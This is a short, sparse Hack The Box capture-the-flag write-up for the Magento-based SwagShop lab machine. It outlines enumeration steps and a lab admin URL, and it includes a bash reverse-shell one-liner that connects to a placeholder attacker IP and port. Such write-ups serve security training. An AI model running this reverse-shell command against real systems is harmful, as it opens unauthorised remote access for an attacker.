Hack The Box — SwagShop

Nmap Scan

  1. Try to check the source code for any credential leakage
  2. Try to brute-force the directories for the same purpose
  3. Try to search for public exploits for Magento

1. Source code enumeration
http://10.10.10.140/index.php/admin
'bash -c "bash -i >& /dev/tcp/your-ip/port 0>&1"'

Congrats ❤

Stay in touch

Offensive Security Enthusiast — twitter @eslam3kll
